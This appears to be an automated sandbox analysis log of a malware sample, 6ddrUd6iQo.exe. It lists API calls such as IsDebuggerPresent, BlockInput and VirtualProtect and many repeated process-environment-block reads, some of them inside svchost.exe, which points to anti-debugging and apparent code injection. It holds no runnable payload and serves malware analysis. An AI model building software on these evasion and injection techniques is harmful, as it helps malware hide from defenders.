Code function: 1_2_00417DE3 LdrLoadDll,

1_2_00417DE3

Source: C:\Users\user\Desktop\6ddrUd6iQo.exe

Code function: 0_2_003441FD BlockInput,

0_2_003441FD

Source: C:\Users\user\Desktop\6ddrUd6iQo.exe

Code function: 0_2_002D3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_002D3B4C

Source: C:\Users\user\Desktop\6ddrUd6iQo.exe

Code function: 0_2_00305CCC RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,

0_2_00305CCC

Source: C:\Users\user\Desktop\6ddrUd6iQo.exe

Code function: 0_2_00404090 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,

0_2_00404090

Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_018F3500 mov eax, dword ptr fs:[00000030h]	0_2_018F3500
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_018F34A0 mov eax, dword ptr fs:[00000030h]	0_2_018F34A0
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: 0_2_018F1E70 mov eax, dword ptr fs:[00000030h]	0_2_018F1E70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0382E388 mov eax, dword ptr fs:[00000030h]	1_2_0382E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0382E388 mov eax, dword ptr fs:[00000030h]	1_2_0382E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0382E388 mov eax, dword ptr fs:[00000030h]	1_2_0382E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385438F mov eax, dword ptr fs:[00000030h]	1_2_0385438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385438F mov eax, dword ptr fs:[00000030h]	1_2_0385438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03828397 mov eax, dword ptr fs:[00000030h]	1_2_03828397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03828397 mov eax, dword ptr fs:[00000030h]	1_2_03828397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03828397 mov eax, dword ptr fs:[00000030h]	1_2_03828397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038EC3CD mov eax, dword ptr fs:[00000030h]	1_2_038EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038383C0 mov eax, dword ptr fs:[00000030h]	1_2_038383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038383C0 mov eax, dword ptr fs:[00000030h]	1_2_038383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038383C0 mov eax, dword ptr fs:[00000030h]	1_2_038383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038383C0 mov eax, dword ptr fs:[00000030h]	1_2_038383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B63C0 mov eax, dword ptr fs:[00000030h]	1_2_038B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038DE3DB mov eax, dword ptr fs:[00000030h]	1_2_038DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038DE3DB mov eax, dword ptr fs:[00000030h]	1_2_038DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038DE3DB mov ecx, dword ptr fs:[00000030h]	1_2_038DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038DE3DB mov eax, dword ptr fs:[00000030h]	1_2_038DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038D43D4 mov eax, dword ptr fs:[00000030h]	1_2_038D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038D43D4 mov eax, dword ptr fs:[00000030h]	1_2_038D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]	1_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]	1_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]	1_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]	1_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]	1_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]	1_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]	1_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]	1_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0384E3F0 mov eax, dword ptr fs:[00000030h]	1_2_0384E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0384E3F0 mov eax, dword ptr fs:[00000030h]	1_2_0384E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0384E3F0 mov eax, dword ptr fs:[00000030h]	1_2_0384E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038663FF mov eax, dword ptr fs:[00000030h]	1_2_038663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386A30B mov eax, dword ptr fs:[00000030h]	1_2_0386A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386A30B mov eax, dword ptr fs:[00000030h]	1_2_0386A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386A30B mov eax, dword ptr fs:[00000030h]	1_2_0386A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0382C310 mov ecx, dword ptr fs:[00000030h]	1_2_0382C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03850310 mov ecx, dword ptr fs:[00000030h]	1_2_03850310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]	1_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]	1_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]	1_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]	1_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]	1_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]	1_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]	1_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]	1_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]	1_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]	1_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]	1_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]	1_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]	1_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]	1_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]	1_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B035C mov eax, dword ptr fs:[00000030h]	1_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B035C mov eax, dword ptr fs:[00000030h]	1_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B035C mov eax, dword ptr fs:[00000030h]	1_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B035C mov ecx, dword ptr fs:[00000030h]	1_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B035C mov eax, dword ptr fs:[00000030h]	1_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B035C mov eax, dword ptr fs:[00000030h]	1_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038FA352 mov eax, dword ptr fs:[00000030h]	1_2_038FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038D8350 mov ecx, dword ptr fs:[00000030h]	1_2_038D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038D437C mov eax, dword ptr fs:[00000030h]	1_2_038D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386E284 mov eax, dword ptr fs:[00000030h]	1_2_0386E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386E284 mov eax, dword ptr fs:[00000030h]	1_2_0386E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B0283 mov eax, dword ptr fs:[00000030h]	1_2_038B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B0283 mov eax, dword ptr fs:[00000030h]	1_2_038B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B0283 mov eax, dword ptr fs:[00000030h]	1_2_038B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038402A0 mov eax, dword ptr fs:[00000030h]	1_2_038402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038402A0 mov eax, dword ptr fs:[00000030h]	1_2_038402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038C62A0 mov eax, dword ptr fs:[00000030h]	1_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038C62A0 mov ecx, dword ptr fs:[00000030h]	1_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038C62A0 mov eax, dword ptr fs:[00000030h]	1_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038C62A0 mov eax, dword ptr fs:[00000030h]	1_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038C62A0 mov eax, dword ptr fs:[00000030h]	1_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038C62A0 mov eax, dword ptr fs:[00000030h]	1_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038402E1 mov eax, dword ptr fs:[00000030h]	1_2_038402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038402E1 mov eax, dword ptr fs:[00000030h]	1_2_038402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038402E1 mov eax, dword ptr fs:[00000030h]	1_2_038402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0382823B mov eax, dword ptr fs:[00000030h]	1_2_0382823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B8243 mov eax, dword ptr fs:[00000030h]	1_2_038B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B8243 mov ecx, dword ptr fs:[00000030h]	1_2_038B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0382A250 mov eax, dword ptr fs:[00000030h]	1_2_0382A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03836259 mov eax, dword ptr fs:[00000030h]	1_2_03836259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038EA250 mov eax, dword ptr fs:[00000030h]	1_2_038EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038EA250 mov eax, dword ptr fs:[00000030h]	1_2_038EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03834260 mov eax, dword ptr fs:[00000030h]	1_2_03834260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03834260 mov eax, dword ptr fs:[00000030h]	1_2_03834260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03834260 mov eax, dword ptr fs:[00000030h]	1_2_03834260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0382826B mov eax, dword ptr fs:[00000030h]	1_2_0382826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]	1_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]	1_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]	1_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]	1_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]	1_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]	1_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]	1_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]	1_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]	1_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]	1_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]	1_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]	1_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03870185 mov eax, dword ptr fs:[00000030h]	1_2_03870185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038EC188 mov eax, dword ptr fs:[00000030h]	1_2_038EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038EC188 mov eax, dword ptr fs:[00000030h]	1_2_038EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038D4180 mov eax, dword ptr fs:[00000030h]	1_2_038D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038D4180 mov eax, dword ptr fs:[00000030h]	1_2_038D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B019F mov eax, dword ptr fs:[00000030h]	1_2_038B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B019F mov eax, dword ptr fs:[00000030h]	1_2_038B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B019F mov eax, dword ptr fs:[00000030h]	1_2_038B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B019F mov eax, dword ptr fs:[00000030h]	1_2_038B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0382A197 mov eax, dword ptr fs:[00000030h]	1_2_0382A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0382A197 mov eax, dword ptr fs:[00000030h]	1_2_0382A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0382A197 mov eax, dword ptr fs:[00000030h]	1_2_0382A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038F61C3 mov eax, dword ptr fs:[00000030h]	1_2_038F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038F61C3 mov eax, dword ptr fs:[00000030h]	1_2_038F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038AE1D0 mov ecx, dword ptr fs:[00000030h]	1_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039061E5 mov eax, dword ptr fs:[00000030h]	1_2_039061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038601F8 mov eax, dword ptr fs:[00000030h]	1_2_038601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h]	1_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038DE10E mov ecx, dword ptr fs:[00000030h]	1_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h]	1_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h]	1_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038DE10E mov ecx, dword ptr fs:[00000030h]	1_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h]	1_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h]	1_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038DE10E mov ecx, dword ptr fs:[00000030h]	1_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h]	1_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038DE10E mov ecx, dword ptr fs:[00000030h]	1_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038DA118 mov ecx, dword ptr fs:[00000030h]	1_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038DA118 mov eax, dword ptr fs:[00000030h]	1_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038DA118 mov eax, dword ptr fs:[00000030h]	1_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038DA118 mov eax, dword ptr fs:[00000030h]	1_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038F0115 mov eax, dword ptr fs:[00000030h]	1_2_038F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03860124 mov eax, dword ptr fs:[00000030h]	1_2_03860124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038C4144 mov eax, dword ptr fs:[00000030h]	1_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038C4144 mov eax, dword ptr fs:[00000030h]	1_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038C4144 mov ecx, dword ptr fs:[00000030h]	1_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038C4144 mov eax, dword ptr fs:[00000030h]	1_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038C4144 mov eax, dword ptr fs:[00000030h]	1_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0382C156 mov eax, dword ptr fs:[00000030h]	1_2_0382C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038C8158 mov eax, dword ptr fs:[00000030h]	1_2_038C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03836154 mov eax, dword ptr fs:[00000030h]	1_2_03836154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03836154 mov eax, dword ptr fs:[00000030h]	1_2_03836154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383208A mov eax, dword ptr fs:[00000030h]	1_2_0383208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038C80A8 mov eax, dword ptr fs:[00000030h]	1_2_038C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038F60B8 mov eax, dword ptr fs:[00000030h]	1_2_038F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038F60B8 mov ecx, dword ptr fs:[00000030h]	1_2_038F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B20DE mov eax, dword ptr fs:[00000030h]	1_2_038B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0382A0E3 mov ecx, dword ptr fs:[00000030h]	1_2_0382A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038380E9 mov eax, dword ptr fs:[00000030h]	1_2_038380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B60E0 mov eax, dword ptr fs:[00000030h]	1_2_038B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0382C0F0 mov eax, dword ptr fs:[00000030h]	1_2_0382C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038720F0 mov ecx, dword ptr fs:[00000030h]	1_2_038720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B4000 mov ecx, dword ptr fs:[00000030h]	1_2_038B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]	1_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]	1_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]	1_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]	1_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]	1_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]	1_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]	1_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]	1_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0384E016 mov eax, dword ptr fs:[00000030h]	1_2_0384E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0384E016 mov eax, dword ptr fs:[00000030h]	1_2_0384E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0384E016 mov eax, dword ptr fs:[00000030h]	1_2_0384E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0384E016 mov eax, dword ptr fs:[00000030h]	1_2_0384E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0382A020 mov eax, dword ptr fs:[00000030h]	1_2_0382A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0382C020 mov eax, dword ptr fs:[00000030h]	1_2_0382C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038C6030 mov eax, dword ptr fs:[00000030h]	1_2_038C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03832050 mov eax, dword ptr fs:[00000030h]	1_2_03832050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B6050 mov eax, dword ptr fs:[00000030h]	1_2_038B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385C073 mov eax, dword ptr fs:[00000030h]	1_2_0385C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038D678E mov eax, dword ptr fs:[00000030h]	1_2_038D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038307AF mov eax, dword ptr fs:[00000030h]	1_2_038307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038E47A0 mov eax, dword ptr fs:[00000030h]	1_2_038E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383C7C0 mov eax, dword ptr fs:[00000030h]	1_2_0383C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B07C3 mov eax, dword ptr fs:[00000030h]	1_2_038B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038527ED mov eax, dword ptr fs:[00000030h]	1_2_038527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038527ED mov eax, dword ptr fs:[00000030h]	1_2_038527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038527ED mov eax, dword ptr fs:[00000030h]	1_2_038527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038BE7E1 mov eax, dword ptr fs:[00000030h]	1_2_038BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038347FB mov eax, dword ptr fs:[00000030h]	1_2_038347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038347FB mov eax, dword ptr fs:[00000030h]	1_2_038347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386C700 mov eax, dword ptr fs:[00000030h]	1_2_0386C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03830710 mov eax, dword ptr fs:[00000030h]	1_2_03830710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03860710 mov eax, dword ptr fs:[00000030h]	1_2_03860710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386C720 mov eax, dword ptr fs:[00000030h]	1_2_0386C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386C720 mov eax, dword ptr fs:[00000030h]	1_2_0386C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386273C mov eax, dword ptr fs:[00000030h]	1_2_0386273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386273C mov ecx, dword ptr fs:[00000030h]	1_2_0386273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386273C mov eax, dword ptr fs:[00000030h]	1_2_0386273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038AC730 mov eax, dword ptr fs:[00000030h]	1_2_038AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386674D mov esi, dword ptr fs:[00000030h]	1_2_0386674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386674D mov eax, dword ptr fs:[00000030h]	1_2_0386674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386674D mov eax, dword ptr fs:[00000030h]	1_2_0386674D
